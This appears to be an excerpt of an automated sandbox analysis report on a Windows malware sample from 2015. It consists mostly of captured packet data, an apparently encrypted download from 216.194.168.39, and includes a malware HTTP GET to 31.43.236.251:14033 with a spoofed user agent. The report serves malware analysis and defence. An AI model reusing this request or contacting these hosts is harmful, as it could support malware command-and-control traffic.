Data Ascii: f}Pu%Gi->7@#V(xiy'x\43s199_x! &["l#2T^!XbU>)D/*L.oq-)/x4LQ19:Bs4qXn2TP3 >]$y?Z=HhR\|!e]r8{8I}T\>((7;;KZ9G3]
372
Feb 19, 2015 13:02:00.970228910 MEZ801032216.194.168.39192.168.1.10Data Raw: c6 14 4d 75 43 ff 12 c5 12 20 11 f7 31 a1 63 9e 27 81 15 a5 f3 82 c2 cd 8d e3 1e 22 5d c5 6a a8 fc d6 48 ab 6e f9 14 56 5e d4 e0 d0 d4 78 1e 74 0f 84 bd c1 a3 49 8c ad eb 4b 40 d8 94 50 2c 4e 4e db 95 ec 49 91 15 22 3b 07 1b 9a 3e 57 a0 ec 26 a5
Data Ascii: MuC 1c'"]jHnV^xtIK@P,NNI";>W&dk($>H^8>{2V*_KWlh;_dL| 1?29>;9QPMz]|0>Pzm^f.l{QZ>Y[BoAc
374
Feb 19, 2015 13:02:00.970340014 MEZ801032216.194.168.39192.168.1.10Data Raw: 7f e8 1f 8a 61 08 43 8a 1b e0 01 ad 70 d1 e8 02 2d 63 4d 8b 3e 16 df bb 60 c6 02 ec 0a f0 23 80 52 f7 82 91 e0 89 13 ad 1d 32 2e d4 15 95 c2 7c 3e d2 c1 ee c9 b2 0a 58 7f f8 1a 09 3c 62 fa 08 32 f6 1f 98 a9 e6 bc 7e 5c 51 83 ad 0a a4 de 9e 32 d8
Data Ascii: aCp-cM>`#R2.|>X<b2~\Q24t! 0}E!\>y.x2&K[,?kh2R>|$GsZw%M nr5Ui9s>XYx<\,`%k`-:~ jQ* 1xG!{n~ #]=>;!T~V1
375
Feb 19, 2015 13:02:00.970344067 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e 1a 34 f8 86 1b f8 46 2a 47 16 a2 39 55 26 a2 39 5d 26 b9 1c 6e 21 e9 55 7b bb f0 da c4 59 ad 0d 96 41 62 34 4a 37 c8 3e 61 ac df b5 8a 65 8a 22 63 65 e9 ae 94 61 7a 91 1c 21 80 40 e1 94 5f c9 43 75 ad 7a ce 7d bd df 9b b1 cd 31 75 26 b2 39 74
Data Ascii: >4F*G9U&9]&n!U{YAb4J7>ae"ceaz!@_Cuz}1u&9t&9~mhPn~Y!hX)V@}~M>k]Aw!xs=':8jr)~`y<<c>!(jG!EVcU4p>:K7!3QNQG!q29Cp>|}
377
Feb 19, 2015 13:02:00.970345974 MEZ801032216.194.168.39192.168.1.10Data Raw: 41 cb 58 a2 49 1c 8e 99 b3 c0 22 af ab 92 07 96 10 a9 6c ad b3 01 62 d8 7f f8 77 eb 3e 5c 30 45 f4 c0 06 eb dc cd b8 e5 2f fd 44 be 37 8d 22 9c d3 9d 10 6a 1b 11 93 5d 76 6b 3f ef 31 d4 2d aa 31 d3 24 aa 3e 96 0d 96 46 6b ec 9a e9 d7 0e e2 a8 f1
Data Ascii: AXI"lbw>\0E/D7"j]vk?1-1$>Fk:"k|)k>b$`EMQMXf?"D28T}o>v*oY<S<eY>1BO"/Wsd|b50;M?$_yQ#
378
Feb 19, 2015 13:02:00.970381021 MEZ801032216.194.168.39192.168.1.10Data Raw: 4c 62 20 a1 11 8e 31 f5 96 a4 20 b2 3e 44 4d 76 10 13 76 3a 3d 36 c5 a8 e2 84 a0 fe d7 47 24 cd cf 8f 0a 58 93 7a 84 ad 02 78 34 5a 7f 12 65 c0 3e ad 2b e0 94 7f 91 70 03 3f 66 ac 5f da 2e c2 cc 8f 24 aa 7e e6 8c b0 1c 57 38 ac c2 5a 6d a1 c9 1d
Data Ascii: Lb 1 >DMvv:=6G$Xzx4Ze>+p?f_.$~W8Zm(F5k-$zVi(\f>4hL:r)m?>j8VM`$TU08=L](8$~dD9{mvj8nOx7UfL>lk|$
380
Feb 19, 2015 13:02:00.970416069 MEZ801032216.194.168.39192.168.1.10Data Raw: 04 20 9a 99 41 98 26 d2 39 48 50 78 67 d3 f8 f2 82 a2 0f e1 24 fb 64 9a ae 97 25 b8 45 7b c0 a3 6d 25 70 ad 78 84 5d a4 4d 7f 66 eb 3e cc 21 1f 9d eb f3 89 a4 2b 7c 99 80 d7 39 51 32 92 79 aa e1 a8 fa ab e9 a9 00 f9 e6 7a 06 ad b0 9b 00 d1 3e ce
Data Ascii: A&9HPxg$d%E{m%px]Mf>!+|9Q2yz>v>*!%Dh =O*1*?hs%zMN6Ux>>g2{qj=#8;}#S`>7e
380
Feb 19, 2015 13:02:00.970582962 MEZ801032216.194.168.39192.168.1.10Data Raw: 2d 37 ac a9 b5 d2 08 6a c1 2f 9e ce 09 64 25 48 a4 bd e4 de ee 95 9e b3 43 88 23 f2 38 87 23 fb 38 8a 0a 92 3e 96 fd a1 6d 83 dc 59 d8 dc 9f 9d 08 3a e7 94 2a 04 25 e6 5e 8c b1 e8 83 a0 2d ad c6 0b 39 32 96 ac 74 03 3e eb a0 9b c6 40 d3 4c a9 ea
Data Ascii: -7j/d%HC#8#8>mY:*%^-92t>@L~9%V:I>y6}lTl>)?$f~{d,?%?}d2E~d}$}~i%i>$"T(P@7>B$yyit<#&:dyfYrlpK>8+>ze
382
Feb 19, 2015 13:02:00.970587969 MEZ801032216.194.168.39192.168.1.10Data Raw: 3b 2b 0e af cc 0a b0 ad 30 19 5b c2 7d 02 e5 0c 3e 42 e9 7e 5b 5f 08 2b 72 3c 66 27 a1 3a 22 d2 3b 39 22 db 3b ff 27 57 5e 7a b0 61 e9 f0 b4 ad 7e dd 42 64 1a c4 a7 a8 3e 70 c6 53 24 1e af 7e d5 4e 41 ba 4e 2f 2b 4a db d5 27 9f 78 fe 66 bd a0 29
Data Ascii: ;+0[}>B~[_+r<f':";9";'W^za~Bd>pS$~NAN/+J'xf)t@>X`f^= {9},%t> e]t.Qfa'BSd>gJk+6^g'~+hlc_>1vFfcj:9 9 -'P~)rQ
383
Feb 19, 2015 13:02:00.970591068 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e 19 26 2b 48 c5 9a 92 70 8d 11 c4 c7 8d 48 6f 23 52 f9 8f 8c 72 35 4f 00 88 ea b5 3b bc 2a a3 fc ae ac ae 57 06 4b e6 3d 76 2c 6c 23 37 81 5a 30 1b d1 a5 12 0a f2 6d 19 c3 e6 88 07 1a 85 df 75 db 41 6d 3a 68 e8 a9 14 0f e8 a9 4c 7e 2c 90 fe bb
Data Ascii: >&+HpHo#Rr5O;*WK=v,l#7Z0muAm:hL~,G>Rf2~(?({w^?nh=)I3"o(c-?,>j##cO!##8(tk^N}),^i(,^khh$k~kH~}hh<ki:bm>s(I {
385
Feb 19, 2015 13:02:00.970593929 MEZ801032216.194.168.39192.168.1.10Data Raw: 8b 8b 64 63 5b 8b fd b5 3e 0b 34 bd 66 aa ce 85 89 cd ea e8 76 7e 76 bf 05 05 15 b0 ed 5f 2f 22 38 5e 2f 29 38 37 b8 ad f7 fe 92 bd 58 da 96 c8 3e b4 33 8d 7e 6f e7 ee 29 d7 18 46 ec 9f 2d fd f1 2b 29 fb b7 b9 2c 81 7d ad f7 ad 3f 67 84 9c 1f 67
Data Ascii: dc[>4fv~v_/"8^/)87X>3~o)F-+),}?gg4b8//Jl1)Q8hTO*(>r]Q^X2t)A`n.|lb>d)7,)?)2g](I>c>WXhC#r8 /r8g8i|ml=|>\
386
Feb 19, 2015 13:02:00.970724106 MEZ801032216.194.168.39192.168.1.10Data Raw: 34 37 53 a7 a7 91 1a d2 82 58 14 ad cc 9d 6e e0 3e b8 d4 c1 3e 40 21 be 07 47 5f 20 71 3d 44 51 58 56 79 82 08 34 2b ef fb 02 f0 8e a3 90 76 ad cf ec f3 a8 b3 99 1a e9 0e 55 f3 ee 1e ba 26 55 33 a2 d7 ad 5f 66 97 33 99 48 27 18 3e 59 50 57 73 06
Data Ascii: 47SXn>>@!G_ q=DQXVy4+vU&U3_f3H'>YPWsjK"J+pV?Ik43s&q^',^>j6WUPRf|>PN^%+f,,eo'>LFgkla@:7MU%U0l/gL3 +tdW.^,l,y
388
Feb 19, 2015 13:02:00.970727921 MEZ801032216.194.168.39192.168.1.10Data Raw: 7f e2 2d ed 3e 94 6c 24 3e e4 6d ee 3f e6 6f cd 7f a7 2d cd 7d e8 6d ee 7d 20 3e ed 3e 8a a5 ec 3e ef 11 bb b2 ac 19 6c 37 85 74 37 ad c7 2c aa 49 8e d9 2c 20 1d b3 ad a8 30 5e b5 d3 b6 19 13 3e 0d 63 bf 5d ef 62 61 5f 35 9b 30 4e e7 9d ac 12 b7
Data Ascii: ->l$>m?o-}m} >>>l7t7,I, 0^>c]ba_50Nr}l?a,(?H)N;G<>,rtv IW~,5RFN(M,4<WMO1&>5,lv9F,*4T>x^,,R,*('|]cH
389
Feb 19, 2015 13:02:00.970731020 MEZ801032216.194.168.39192.168.1.10Data Raw: 69 18 3c cd e3 11 8a 8e 3e 9f 33 8e be 69 56 bd 4d 75 81 a8 91 10 81 a8 9a 13 61 ad c8 b4 86 cd 48 5c 7b 39 3e 04 4d 04 86 84 2a ce 79 9b d9 84 d8 5d 30 cb 7b 52 2b aa 71 1b 61 a8 7a 1a ad cd 27 3d 5f ad 20 45 e2 40 53 c2 1a cc 3e 8d df 89 6d 75
Data Ascii: i<>3iVMuaH\{9>M*y]0{R+qaz'=_ E@S>muK!p%X_j JB.VSx~"CZ3N>CJqa0P1aq7kZ.s!_3N'2>T?8[vg.''%@MpO(8(p5wtCiBkw.ns_,7R>#*deKKLU8
391
Feb 19, 2015 13:02:00.970760107 MEZ801032216.194.168.39192.168.1.10Data Raw: 7b 16 4f 87 42 3b 70 a6 66 74 2f cd ae d8 2b dc 54 7e 09 ad 39 40 1c 50 1e a7 7f ec 3e 76 4c 6a 3c c1 3f 29 03 8a 0d 9a e1 8d f7 a7 00 b9 16 ce 3e c1 3c af 42 ea 4a 0c ef 8b a5 b0 80 83 db ba 83 de 2f d3 62 cf ff 12 78 4a 3f ad df 41 ee a9 66 e9
Data Ascii: {OB;pft/+T~9@P>vLj<?)><BJ/bxJ?Af>h7m!5^9(9(n:+R>zg{M\:c/.m&ye>8T}r|?/%a?z[>qvfm=k*y;.+>[{
392
Feb 19, 2015 13:02:00.970840931 MEZ801032216.194.168.39192.168.1.10Data Raw: 8f cd ff 7e 02 12 69 d8 3e 86 3c ec d5 93 cf 58 78 96 06 b2 3b 96 35 b2 3b 9e 35 a5 73 c7 30 a1 d8 0d a2 29 f1 0f e7 ad d6 ce a9 6c 1c 56 f8 0f 3e 58 20 de 2e 5b 62 b9 b4 92 b1 53 5b fc 43 f5 7b f7 31 5d 69 fd a7 09 7e 21 c4 d1 3e d4 d6 78 81 40
Data Ascii: ~i><Xx;5;5s0)lV>X .[bS[C{1]i~!>x@2J/)>1^sq}p^0^p}~p$0kUNeXM6v>s~0}1,}q^11ze-/>6F,_$4Eev60<nB a>prXN
393
Feb 19, 2015 13:02:00.970844984 MEZ801032216.194.168.39192.168.1.10Data Raw: 12 0a c1 f9 06 b7 31 cb 5e 9e b2 5b 36 b1 9a ad 2b ef 69 09 7f 31 20 fb 3e ab 2e 2d a0 b2 69 a3 53 39 74 ec 1b 4c 10 b9 11 fd 1e ab 3d d3 37 89 38 ba 51 62 75 c1 62 ad 3b 6a cd 85 54 16 a4 ec 3e 8b b7 4c eb 0d 13 5a c0 f3 a9 1f 74 f0 5d a8 51 00
Data Ascii: 1^[6+i1 >.-iS9tL=78Qbub;jT>LZt]Q]Z2:t/UQ{Ic>>~~ZF@Lm~9-48'4{Z>_^Zh%7;$7;Zz+u6}>6rk\!wFl;LZ1b(-;7;7O3|J>|K+m~'72
395
Feb 19, 2015 13:02:00.970963955 MEZ801032216.194.168.39192.168.1.10Data Raw: fe 37 5b c8 69 93 50 52 32 98 3f ad 5a 29 63 90 76 da 24 d7 3e 4f de ad da d0 62 cf 23 65 00 38 0a 26 0e fd 7e 79 3f ef 99 37 02 54 34 ae 82 b0 46 6a 60 ea fd ac 71 1f 1c cd 33 0e 13 7b 74 ed c5 9e 53 ad a0 6a f1 be 3a 7b 4b d8 3e 2f 8e 5a 57 b9
Data Ascii: 7[iPR2?Z)cv$>Ob#e8&~y?7T4Fj`q3{tSj:{K>/ZW;Oms\^*&^53|G=0Rl33vMYn:}{pO>2.BJW&lb,?j?2?63`Zw{1sK/%_>[T)+,M#23qT}P-
396
Feb 19, 2015 13:02:01.968240023 MEZ801032216.194.168.39192.168.1.10Data Raw: 97 2c 18 6a 25 e5 34 54 d4 eb c8 90 de 3f 65 ad 29 ff c7 dd ae aa 06 ec 3e c5 98 7e 7d 4a 5b d3 ea 80 0a e4 5e 1e cb a8 c1 77 cb a8 ca 76 34 5f d9 ae 61 a5 38 aa fc ad da 1a 33 a9 2a 02 d1 da 3e 3b 7d cd f4 c8 af e6 51 7a 7a db db 22 d2 3c ef 74
Data Ascii: ,j%4T?e)>~}J[^wv4_a83*>;}Qzz"<t4*"j 2828`>3#0/!h<{;44^bb2'>/?8V[4.3939FMtz_>&Gg1XpTg40;1;a>P}~[o.9_"dPy
397
Feb 19, 2015 13:02:01.968597889 MEZ801032216.194.168.39192.168.1.10Data Raw: 0e 6e 28 59 0e 54 ce c0 c9 3c 38 f5 33 39 bb ad 17 91 a8 6b 7a cc 99 3a 3e 2b 9c 29 93 1e 3a f0 cf 69 ff b0 27 63 59 4c 9d 29 35 cd 49 7e c9 ad 2a b6 23 ad 40 ad 4a 36 c3 3c 13 ff 3e 02 68 89 bf 33 1a 28 c0 7e 2b 5b 21 7d 2d a3 e3 05 8a 93 3e 5f
Data Ascii: n(YT<839kz:>+):i'cYL)5I~*#@J6<>h3(~+[!}->_w0?5c?-uiRI/J952x8k-H>$BMG5b{xnv43>PaZdnW5tVnoN2C>Ia3238
399
Feb 19, 2015 13:02:01.968625069 MEZ801032216.194.168.39192.168.1.10Data Raw: 4f 11 33 aa e1 ca e9 a8 ea d5 ad 4f db 83 5b 88 86 d2 63 99 21 0d ad b7 e4 e9 36 ed 69 cb 69 83 d9 8b 5a ad 68 94 bf ec 7d b8 76 cb 3e d8 75 ed 3f 5b 75 8c 7f df 56 cd 3f f8 77 ee bf bd 75 8d 7d 9f 77 ac 7e df 2e ed b7 e0 77 ec 7d e0 76 ee 5e a3
Data Ascii: O3O[c!6iiZh}v>u?[uV?wu}w~.w}v^6^v}~&$b6*#t3#2VYjv<>@]"w2,kEwg>YoR~+e:4R6W]zg)~K2Y6d^*/.gC>I(~l:/`tBC\%>
400
Feb 19, 2015 13:02:01.968640089 MEZ801032216.194.168.39192.168.1.10Data Raw: 77 e5 6b 30 6c 2b e5 65 3e 70 b1 12 73 45 bc e7 f4 df 8f 54 2a 63 30 12 6e ce 3e 22 38 43 bd ab eb 5a ee 70 75 90 04 ad d7 de af 04 7d 90 a6 ec 3e 16 f0 cf 3d 95 c3 b3 83 49 0e 06 82 04 a5 d7 57 33 38 49 94 3e f4 e0 d2 55 47 91 d1 2c 67 ab 61 49
Data Ascii: wk0l+e>psET*c0n>"8CZpu}>=IW38I>UG,gaIgab>N^[S D28|G-7#yx=aB;]^}C][gMB8usP;<=;0=>x2gku-h=8dV94A-{ED?>Q"uQpRLSi)C>R8>Y8klL
401
Feb 19, 2015 13:02:01.968650103 MEZ801032216.194.168.39192.168.1.10Data Raw: c5 28 45 33 fe 74 58 40 8c 75 63 f2 30 f3 37 ad 57 e1 b4 c4 72 32 e1 7c 3e ff 6e e6 7d 56 e3 18 8d b0 38 bc 66 c1 b7 37 c2 45 39 f1 89 94 46 46 90 d4 8a ad 4f 99 d1 3b 09 4f 82 f9 3e fd af 7c 23 1a 1d 02 bf b5 e6 fa e1 b7 e1 a0 1b 0a 13 d3 3e fa
Data Ascii: (E3tX@uc07Wr2|>n}V8f7E9FFO;O>|#>85,:@5w_34-c\D9g93Y-plq<we>z+E5tS{>cd)[/>4<;xr996-NNe<Y>L;ox9bMxh_
403
Feb 19, 2015 13:02:01.968857050 MEZ801032216.194.168.39192.168.1.10Data Raw: 42 95 6c f9 c9 c1 82 4e 5f ad 01 ad 79 0e 7c 77 fc c1 4e f8 3e 15 32 9e 5d 21 bf fd 33 1c 47 7c 27 86 ec 8c a4 35 3b 06 b5 ff 35 a3 a7 cf 6e ad 31 37 07 4c cc 29 43 61 3e 2c 67 52 05 c1 2b fd 6f 65 51 f7 5b da c0 be 04 1e 63 ad cf 21 2e 5c e6 c5
Data Ascii: BlN_y|wN>2]!3G|'5;5n17L)Ca>,gR+oeQ[c!.\1>DOO9,7j;>o{~k&&:E31S( n;0{!-@+W+:WQ #;5ja^_O~u>`X?C+U$"3D>]hkQgJlHfw;.'OYA>
404
Feb 19, 2015 13:02:01.968878984 MEZ801032216.194.168.39192.168.1.10Data Raw: a3 21 3c db fa e6 16 01 15 f1 e2 ad 90 45 1b 50 66 6f 74 c0 3e 5b 65 dc 29 ca 5c 34 c9 89 6f b1 65 45 64 cb 65 2b 3c 4e 54 f4 57 20 56 85 74 ad 57 25 6d 5d 3a eb 27 cd 46 fd d0 f2 71 96 73 aa 71 95 69 cf c2 93 5f 7c 21 a8 11 d5 6a 76 3c 98 7e fb
Data Ascii: !<EPfot>[e)\4oeEde+<NTW VtW%m]:'Fqsqi_|!jv<~cE7{>3h?f<6aFz>Q&_K~EW9:0I8y2\>FP8a+BA{<PMD_">RNro<mQ^z
406
Feb 19, 2015 13:02:01.968894958 MEZ801032216.194.168.39192.168.1.10Data Raw: e5 c5 26 f8 38 4d 02 a7 06 fb 04 89 ab 3e 8d ad 44 08 c9 a5 20 3b f4 c0 3e da f8 e5 6e fa 6d f2 d2 f7 64 f7 bd f1 ac 1e f1 9a 3d 82 7d aa a3 ae a5 a5 f7 a3 d6 a3 31 82 38 db 3b a8 36 d5 86 ad c6 c0 bc 64 89 bb 78 30 3e 94 da ba 4f 54 4f 61 73 03
Data Ascii: &8M>D ;>nmd=}18;6dx0>OTOas^v6yN>}Ik]}bX?8]?>}W-UD~Fj;;i;;xFxa>e:@(]3~>xz/$'K>Aq(wQ~Q`>c_$]_*l
407
Feb 19, 2015 13:02:01.968918085 MEZ801032216.194.168.39192.168.1.10Data Raw: f4 7c 3e 3a 21 1c 3b ad f6 30 c1 2b 74 a8 6d 1a 36 c9 0a a8 44 7d 8a dc a9 53 3f ce 3a 2b c1 de 0c df c8 ad 46 ad a7 cf 88 33 7f 1a 3e 32 7e 4a b3 da c4 ec b9 69 6f 13 23 11 0e 31 73 c3 3f 9a 3a cf d3 7a 02 7a ba ad 01 e9 1b b5 5f 2e 59 3d 3c e7
Data Ascii: |>:!;0+tm6D}S?:+F3>2~Jio#1s?:zz_.Y=<E?V:t%j/L>,VyAR?1}iWa-&zuWi~?FBxD3Sn{<~?QCB?;hB%>2'SeY&}Pq>~q[oQ
408
Feb 19, 2015 13:02:01.969108105 MEZ801032216.194.168.39192.168.1.10Data Raw: 76 14 82 f8 8c 94 d6 8e 25 09 b0 5b d5 54 92 d2 5c b7 45 02 3b bc 45 ad 62 39 c2 35 d0 b3 42 8a 3e cd 6d 17 32 1c c0 77 b6 1e 61 ee 93 66 c1 ef c0 e0 40 8c 0b ef c2 c2 9f b6 4b ad fe 62 4e bd d4 e6 59 85 3e 96 55 c6 c4 66 04 37 00 27 3a 4d ee 5d
Data Ascii: v%[T\E;Eb95B>m2waf@KbNY>Uf7':M]h80?A,?!{vx>z^|+1L@oauEYF?<;//@/B\v:w>FKPD>@MwM(eG9dGK<N|Kq@
410
Feb 19, 2015 13:02:01.969118118 MEZ801032216.194.168.39192.168.1.10Data Raw: 3f d2 01 ad 70 42 41 a8 3e be 7f ad 47 e8 2c 8c 49 e1 32 df 3e ee 2f c2 02 a4 71 82 0f 88 62 8c 5a e6 23 c3 5b e2 41 c2 58 b7 62 f9 6b cb 6d ad 07 ae 60 df 4b ee 2e c8 3e ef 2c c3 51 f4 7d 8e 46 91 25 df 1d ac 7e a6 03 f3 41 df 4c f0 2d ce 53 ed
Data Ascii: ?pBA>G,I2>/qbZ#[AXbkm`K.>,Q}F%~AL-S`.5Qz\%^AR#P/YmPz>-IbR!V%K@%J%V.~9=/BhI"V(4?I^<)[ALR/QQ2&3pK06)Qr<2
411
Feb 19, 2015 13:02:01.969206095 MEZ801032216.194.168.39192.168.1.10Data Raw: c1 46 fc 80 28 ce 45 af 19 30 42 e6 db 95 31 4b 46 ea a7 ab ea 33 47 9c 2d 42 ba 39 02 29 82 94 36 e4 12 73 c3 a5 5e 6d 2f 78 90 d1 2e 54 b6 ec d8 98 6f ac 6f da 5d e9 f7 a5 76 f6 64 3d 4f c2 8b 5b 16 13 ef e2 e3 ae 3e 4c 1b 15 b5 d0 02 d5 27 06
Data Ascii: F(E0B1KF3G-B9)6s^m/x.Too]vd=O[>L' [DM?<Gs8#%R2q+y~!HC07C2Y-W3_J#^5;K3]LK$}GOP?zf-S3(-$>,|9.#"^kU68
412
Feb 19, 2015 13:02:01.969537020 MEZ801032216.194.168.39192.168.1.10Data Raw: c3 b2 43 a2 3c 0a 68 f5 7f 5d 7d 11 3e ba 02 ee 7e fd f5 ec 7d fd b1 f3 b9 69 29 ed 76 84 c3 51 80 c6 09 7f 6f ac 44 1d 3e b4 04 ad 7d 02 69 1e 48 0c 6c 7f 7e 05 70 ec 7e 45 05 ad 32 4b 06 fc 0c e6 71 7c be d5 08 95 8d af d4 a0 3e ef 44 ad 7f 4d
Data Ascii: C<h]}>~}i)vQoD>}iHl~p~E2Kq|>DMsL>PE~}E}WE_`YY>D~[p>*D~\s]LGc@|N>D> X>djU.E>'U}hFZMt,D??-Dgenz.?1>[B>8D5s
414
Feb 19, 2015 13:02:01.969546080 MEZ801032216.194.168.39192.168.1.10Data Raw: 76 c1 4d 7f 0b 04 03 dd 58 08 89 2a 36 4f 04 ef bb 06 8c 75 01 e6 45 ad 09 2e ef 41 e3 53 01 a9 95 11 c0 c2 01 ca 57 d6 55 6b 7a 75 78 1f 9b 6c 03 fd 7e bd e4 6b a1 af fb 1c 24 7a 6f f4 61 ed e3 17 fe 98 4d 30 35 ad df dc 06 ba d9 30 04 cd be c5
Data Ascii: vMX*6OuE.ASWUkzuxl~k$zoaM050|xERl5gNZ}$@DOIdH<t|Bqo7>LAoVwiLGQE]kE@,W.>SA6 >. @7 u{7|;>R0
416
Feb 19, 2015 13:02:01.969549894 MEZ801032216.194.168.39192.168.1.10Data Raw: 3c 86 07 37 0c d3 a9 ac 68 ee 00 af 51 9d 4a 18 54 de 8b ec 8f f1 7c cf ab df ba 2d 52 b9 31 48 7d 9b d8 e8 04 fb 8b 0e 6d dd 09 78 07 ff 0e ad 26 3b 44 4d ef 1b 7c 30 7f 66 7f bf cb a4 13 49 2b db b6 ad c2 a2 ca a0 05 87 13 87 1e f5 0e db 3b c4
Data Ascii: <7hQJT|-R1H}mx&;DM|0fI+; l(F5%s)|Al'%@EA26>&2&f|cu|Cu@2uu,&-;>Hv_NEr}1xP.DI" aWG?OF
417
Feb 19, 2015 13:02:01.969554901 MEZ801032216.194.168.39192.168.1.10Data Raw: 21 77 06 92 9b 2e 48 f9 4a d5 c2 45 ef 74 89 a5 77 32 6e e8 51 ee 28 2c 50 45 20 3d bb fe ae a2 23 fa 4c 96 2f 0e 27 75 a4 c9 a5 a3 3c 92 2e c2 dc 5c 83 42 0f 2e 08 5f cf 0a 44 fb 8c 48 27 b1 3e 0b 03 57 6e e2 db 63 ec 59 35 82 10 57 27 ee 0a 96
Data Ascii: !w.HJEtw2nQ(,PE =#L/'u<.\B._DH'>WncY5W'&tAVH"I}J^x6tv,T~i-o~g8~p7Q'HFxQ$o'gF(f1L%'k!?'uf;gLIQLoN8@-}Bz~&8KPHQO'
418
Feb 19, 2015 13:02:01.969558954 MEZ801032216.194.168.39192.168.1.10Data Raw: c6 a7 9c ed 3c 01 fc 94 5f de 8d d0 06 dd 4b 00 78 89 84 ff 24 a9 7e e7 1e a0 0b ec 3e fd 6c 94 8c 7c 09 5e ea a5 d3 81 73 90 70 bf 3e 09 e1 6d 4c f7 24 be 58 a9 99 f9 a8 48 6c 94 3d ee 5f 8d a8 e0 e0 73 39 48 71 1f af fe 0d ec 23 a0 5e e2 f8 f8
Data Ascii: <_Kx$~>l|^sp>mL$XHl=_s9Hq#^dI)~y>ftvO>U&rfr-[$h:F<H5lA/k*~1y%I'c{aqXuLn(nuKz8AYEKSkX
420
Feb 19, 2015 13:02:01.969698906 MEZ801032216.194.168.39192.168.1.10Data Raw: 9a 35 0d df e3 1a 7f 92 75 74 00 38 0a 36 49 07 b8 6c 59 5a 90 52 6a ef 3e 89 ef 7a c9 40 ed ac 21 20 ad dc 3c 07 b7 dc 44 c0 3f b5 7b 39 01 0d 08 46 39 63 17 a6 43 cd 7f 88 ad dc d5 48 6a 77 3c 99 2e dc 63 16 48 30 86 bf 4a cb 4f d1 a4 e0 fe 04
Data Ascii: 5ut86IlYZRj>z@! <D?{9F9cCHjw<.cH0JOw.yNf:KF8$Z:U^/TugFo;;D|HNS-[N?,,tRO>kg;!. u$SKfT 5E[_-5E-V[?DPRBFiO6:O|2|
421
Feb 19, 2015 13:02:01.969707012 MEZ801032216.194.168.39192.168.1.10Data Raw: 09 a5 60 8d ad 6c f1 2b 9c 3d 7b d0 45 a9 9d 70 5e be 66 7b 4f d3 a8 a5 d3 7f a9 2b 09 45 10 28 ae ae ae ee f0 4e 5d 68 09 fd 44 ad c7 40 07 b8 6b 53 b8 19 3a c0 80 ab 06 75 39 e0 73 d8 4c 15 02 59 0c 39 97 d3 9e ac 0b a0 2e 4b ef 91 fd fe 3f 9a
Data Ascii: `l+={Ep^f{O+E(N]hD@kS:u9sLY9.K?TMOCE^u,rz[~sXQ>R!,}rk8./9tML/L>4,,WZ3e%<v2{Lfnum_
423
Feb 19, 2015 13:02:01.969710112 MEZ801032216.194.168.39192.168.1.10Data Raw: 26 b7 26 cd 27 85 48 92 5c f0 aa c9 3b d5 5a e8 95 57 4d dc 3b b3 2f a8 d8 9d 48 fa 9e fe f7 e9 1e b5 02 4d 2e 9d 66 de 29 aa 2f ab 14 17 2b bc 7a dd 67 eb 8c 17 4e fc b6 20 4e 26 de 2d 41 ac d3 e1 4b 7b bf 64 4b 0a 28 2c 2e ad 2f 66 4e cc 0e eb
Data Ascii: &&'H\;ZWM;/HM.f)/+zgN N&-AK{dK(,./fNN>NI=NOINN>l?l?fK;N7O3O.^)YvS>p~O?8~OGHd88gH7+EN6Y7$"8UM>8E,67F^)+,FZ8%m7OH/N
424
Feb 19, 2015 13:02:01.969796896 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e d9 6a 8f 80 d8 b0 53 c1 39 5e af 3e 63 44 af 32 96 4d 50 3e 67 c9 bc 3e 66 2e f7 ca 92 4d 53 2e 60 4f 5a 1b 8f a9 14 c5 94 b0 bc 2c 7a b5 57 c9 93 4d 2f 62 99 4c 59 35 9e 4a 4b 87 4a a9 a5 87 e4 a9 53 3a 70 a9 50 3c f0 13 ad 3e 31 18 5a 3c 64
Data Ascii: >jS9^>cD2MP>g>f.MS.`OZ,zWM/bLY5JKJS:pP<>1Z<d5bSE@T<^^{D.|Z._K]Q!^Q?|pU6:|LYo}W_<Oi7Q=gL8u?Lj8.}eMoMJh8~V<kwX
425
Feb 19, 2015 13:02:01.969872952 MEZ801032216.194.168.39192.168.1.10Data Raw: da 7a 4d ae c1 59 47 ae d8 a4 4e 8d 38 85 b2 54 c5 51 4d 33 87 a9 ab 49 da 74 f6 5a c1 55 0f 52 c1 50 b3 8f d8 af 4f a5 36 17 f6 ac 3b af 49 56 2c 48 0f 50 1c 55 ab 71 e1 b2 4f 73 7d b3 ff af 3e 6c f6 55 c3 b3 8f 13 3a 0f b9 ab 62 b6 b6 57 c4 41
Data Ascii: zMYGN8TQM3ItZURPO6;IV,HPUqOs}>lU:bWAOTgJdRb9O<IOQO6 zOP7ma7O=P>In8QH`S>m?EOV,%9"'k-&OjP9-)&O/58'$5UW8X5
426
Feb 19, 2015 13:02:01.969881058 MEZ801032216.194.168.39192.168.1.10Data Raw: c5 e9 ad bd 2e ac 4b ac ce 13 59 2f 63 d5 b7 8f c4 34 61 ac d8 a8 4f b8 0e 71 2f f1 3c 84 e1 af d8 ff b0 a5 80 ee 61 b8 81 c5 b6 ed 47 ac 53 4b 36 5d b0 4c 87 0b 44 13 0e 64 b5 ef da 20 50 8f d8 29 89 5d 39 24 59 6a da c4 51 ac 81 2c 59 bf 1c d2
Data Ascii: .KY/c4aOq/<aGSK6]LDd P)]9$YjQ,YY%'O4l5QjRiR#2/ M8P>SM26e6 PP_>8`:>{?-@N=Y?>>`s1@PC:*U=eEY|D1nDYF>]>K=[!{O ML
428
Feb 19, 2015 13:02:01.970072031 MEZ801032216.194.168.39192.168.1.10Data Raw: 0b df 67 0a 0b 99 67 ad cd b5 ab 98 c0 b4 4b 9b 3e a6 64 d8 08 f9 64 3c 08 84 f3 9b c5 b3 58 9a 28 b1 52 8f 09 a9 65 97 09 ce 65 ad 6c be 0c 9a 54 bd 24 9a 3e 09 65 23 09 16 65 0b 09 8d e0 9a 80 b9 98 9a e8 b8 52 4f 09 7e 65 b5 06 8c 6a a5 76 aa
Data Ascii: ggK>dd<X(ReelT$>e#eRO~ejv2-jb5MRkkV>hhyGeRiNIi5B>nn;W4Rooxk0o\oo>JoPl`6TR;plumg
428
Feb 19, 2015 13:02:09.318830013 MEZ103314033192.168.1.1031.43.236.251GET /1902uk11/377142/41/7/4/ HTTP/1.1
User-Agent: Mazilla/5.0
Host: 31.43.236.251:14033
Cache-Control: no-cache
429

Hooks - Code Manipulation Behavior

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

General

Start time:13:01:42
Start date:19/02/2015
Path:C:\in.exe
Wow64 process (32bit):false
Commandline:unknown
